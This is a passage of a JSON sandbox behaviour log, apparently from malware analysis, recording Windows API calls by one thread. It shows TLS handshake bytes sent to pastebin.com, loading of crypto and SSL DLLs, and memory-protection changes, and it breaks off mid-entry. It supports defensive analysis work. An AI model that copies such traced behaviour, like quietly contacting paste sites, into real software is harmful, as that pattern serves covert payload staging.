                "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00<\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "1596"
              }
            ],
            "repeated": 0,
            "id": 1438
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffee0a46943",
            "parentcaller": "0x7ffee0a45ca2",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "0",
                "pretty_value": "ThreadBasicInformation"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00<\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "1596"
              }
            ],
            "repeated": 0,
            "id": 1439
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffec77be76b",
            "parentcaller": "0x7ffec779c9ba",
            "category": "network",
            "api": "WSASend",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Socket",
                "value": "1192"
              },
              {
                "name": "Buffer",
                "value": "\\x16\\x03\\x03\\x00\\xae\\x01\\x00\\x00\\xaa\\x03\\x03i\\x1e\\xf4[!J\\xe6>\\xdc\\xd5}\\xd8\\xdf\\xd8\\x90]n\\x9b\\x9f\\xad\\xc7\\x15\\x064}\\xc8\\x15+U\\xf8\\xfe\\xf9\\x00\\x00&\\xc0,\\xc0+\\xc00\\xc0/\\xc0$\\xc0#\\xc0(\\xc0'\\xc0\n\\xc0\t\\xc0\\x14\\xc0\\x13\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\n\\x01\\x00\\x00[\\x00\\x00\\x00\\x11\\x00\\x0f\\x00\\x00\\x0cpastebin.com\\x00\\x05\\x00\\x05\\x01\\x00\\x00\\x00\\x00\\x00\n\\x00\\x08\\x00\\x06\\x00\\x1d\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00\\x00\r\\x00\\x1a\\x00\\x18\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x02\\x01\\x04\\x03\\x05\\x03\\x02\\x03\\x02\\x02\\x06\\x01\\x06\\x03\\x00#\\x00\\x00\\x00\\x17\\x00\\x00\\xff\\x01\\x00\\x01\\x00"
              }
            ],
            "repeated": 0,
            "id": 1440
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffec77bb648",
            "parentcaller": "0x7ffec779c7cd",
            "category": "network",
            "api": "WSARecv",
            "status": false,
            "return": "0xffffffffffffffff",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              }
            ],
            "repeated": 0,
            "id": 1441
          },
          {
            "timestamp": "2025-11-20 10:58:35,266",
            "thread_id": "1596",
            "caller": "0x7ffee0a46943",
            "parentcaller": "0x7ffee0a45ca2",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "0",
                "pretty_value": "ThreadBasicInformation"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00<\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "1596"
              }
            ],
            "repeated": 0,
            "id": 1442
          },
          {
            "timestamp": "2025-11-20 10:58:35,297",
            "thread_id": "1596",
            "caller": "0x7ffec77be76b",
            "parentcaller": "0x7ffec779c9ba",
            "category": "network",
            "api": "WSASend",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Socket",
                "value": "1192"
              },
              {
                "name": "Buffer",
                "value": "\\x16\\x03\\x03\\x00%\\x10\\x00\\x00! \\x97$.(\\x8f^\\x97WJC\\xb1\\xf0\\x94w\\xc70F\\xd7\\xf3\\x9d\\xb1\\x99\\xa7/\\x87\\x9b\\x9e\\xdb^\\xd6\\x1dr\\x14\\x03\\x03\\x00\\x01\\x01\\x16\\x03\\x03\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00=?X\\xc3\\x88,\\x88\\xb3eZx\\xbf\\x84\\x94?\\xdd\\xcc\\x86\\x0e\\x97\\x91e\\x16y\\xbfVV\\xf3\\xfc\\x9a\\xa6\\x97"
              }
            ],
            "repeated": 0,
            "id": 1443
          },
          {
            "timestamp": "2025-11-20 10:58:35,297",
            "thread_id": "1596",
            "caller": "0x7ffec77bb648",
            "parentcaller": "0x7ffec779c7cd",
            "category": "network",
            "api": "WSARecv",
            "status": false,
            "return": "0xffffffffffffffff",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              }
            ],
            "repeated": 0,
            "id": 1444
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee0a46943",
            "parentcaller": "0x7ffee0a45ca2",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "0",
                "pretty_value": "ThreadBasicInformation"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00<\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "1596"
              }
            ],
            "repeated": 0,
            "id": 1445
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d59000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1446
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffedfab5583",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "sspicli.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0a40000"
              }
            ],
            "repeated": 0,
            "id": 1447
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffedfab5583",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffee0a40000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "sspicli.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1448
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffedfab55a5",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "SspiCli.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee0a40000"
              },
              {
                "name": "FunctionName",
                "value": "FreeContextBuffer"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee0a44820"
              }
            ],
            "repeated": 0,
            "id": 1449
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffedfab55c7",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\mskeyprotect"
              },
              {
                "name": "DllBase",
                "value": "0x7ffecb060000"
              }
            ],
            "repeated": 0,
            "id": 1450
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffedfab55c7",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\NTASN1"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0530000"
              }
            ],
            "repeated": 0,
            "id": 1451
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffedfab55c7",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "mskeyprotect.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecb060000"
              }
            ],
            "repeated": 0,
            "id": 1452
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffedfab55c7",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffecb060000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "mskeyprotect.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000800"
              }
            ],
            "repeated": 0,
            "id": 1453
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffedfab55e9",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "mskeyprotect.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecb060000"
              },
              {
                "name": "FunctionName",
                "value": "KeyFileProtectSessionTicket"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecb0674d0"
              }
            ],
            "repeated": 0,
            "id": 1454
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffedfab560a",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "mskeyprotect.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecb060000"
              },
              {
                "name": "FunctionName",
                "value": "KeyFileUnprotectSessionTicket"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecb0679b0"
              }
            ],
            "repeated": 0,
            "id": 1455
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee352e53f",
            "parentcaller": "0x7ffee348faf7",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "93"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x7f7\\x9e}"
              }
            ],
            "repeated": 0,
            "id": 1456
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee3485157",
            "parentcaller": "0x7ffee34843ea",
            "category": "process",
            "api": "NtOpenSection",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "ncrypt.dll"
              }
            ],
            "repeated": 0,
            "id": 1457
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34cf37b",
            "parentcaller": "0x7ffee34cf207",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Temp\\ncrypt.dll"
              }
            ],
            "repeated": 0,
            "id": 1458
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34cf37b",
            "parentcaller": "0x7ffee34cf207",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ncrypt.dll"
              }
            ],
            "repeated": 0,
            "id": 1459
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34cfc9c",
            "parentcaller": "0x7ffee34cf7b0",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000514"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ncrypt.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1460
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34cfcfe",
            "parentcaller": "0x7ffee34cf7b0",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000518"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d",
                "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000514"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ncrypt.dll"
              }
            ],
            "repeated": 0,
            "id": 1461
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee3484d42",
            "parentcaller": "0x7ffee3484aaa",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000518"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0570000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00027000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1462
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee347fee4",
            "parentcaller": "0x7ffee347fad8",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0592000"
              },
              {
                "name": "ModuleName",
                "value": "ncrypt.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1463
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee3485082",
            "parentcaller": "0x7ffee34879d2",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0589000"
              },
              {
                "name": "ModuleName",
                "value": "ncrypt.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1464
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34cfd68",
            "parentcaller": "0x7ffee34cf7b0",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000518"
              }
            ],
            "repeated": 0,
            "id": 1465
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34cfd71",
            "parentcaller": "0x7ffee34cf7b0",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000514"
              }
            ],
            "repeated": 0,
            "id": 1466
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7bac",
            "parentcaller": "0x7ffee34a288a",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0589000"
              },
              {
                "name": "ModuleName",
                "value": "ncrypt.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1467
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7bac",
            "parentcaller": "0x7ffee34a288a",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\ncrypt"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0570000"
              }
            ],
            "repeated": 0,
            "id": 1468
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34d7cc6",
            "parentcaller": "0x7ffee34addf7",
            "category": "system",
            "api": "NtQuerySystemTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 4,
            "id": 1469
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0592000"
              },
              {
                "name": "ModuleName",
                "value": "ncrypt.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1470
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0592000"
              },
              {
                "name": "ModuleName",
                "value": "ncrypt.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1471
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\ncrypt"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0570000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffee0576200"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 1472
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfb33000"
              },
              {
                "name": "ModuleName",
                "value": "schannel.DLL"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1473
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfb33000"
              },
              {
                "name": "ModuleName",
                "value": "schannel.DLL"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1474
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0592000"
              },
              {
                "name": "ModuleName",
                "value": "ncrypt.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1475
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0592000"
              },
              {
                "name": "ModuleName",
                "value": "ncrypt.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1476
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee14e6f25",
            "parentcaller": "0x7ffee14e4f88",
            "category": "device",
            "api": "NtDeviceIoControlFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000178"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\KsecDD"
              },
              {
                "name": "IoControlCode",
                "value": "0x00390400"
              },
              {
                "name": "InputBuffer",
                "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x02\\x00\\x01\\x00\\xfe\\x7f\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00S\\x00S\\x00L\\x00 \\x00P\\x00r\\x00o\\x00t\\x00o\\x00c\\x00o\\x00l\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00"
              },
              {
                "name": "OutputBuffer",
                "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x01\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffP\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00c\\x00r\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x90\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffM\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00S\\x00S\\x00L\\x00 \\x00P\\x00r\\x00o\\x00t\\x00o\\x00c\\x00o\\x00l\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\x00c\\x00r\\x00y\\x00p\\x00t\\x00s\\x00s\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1477
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee0574501",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\ncryptsslp"
              },
              {
                "name": "DllBase",
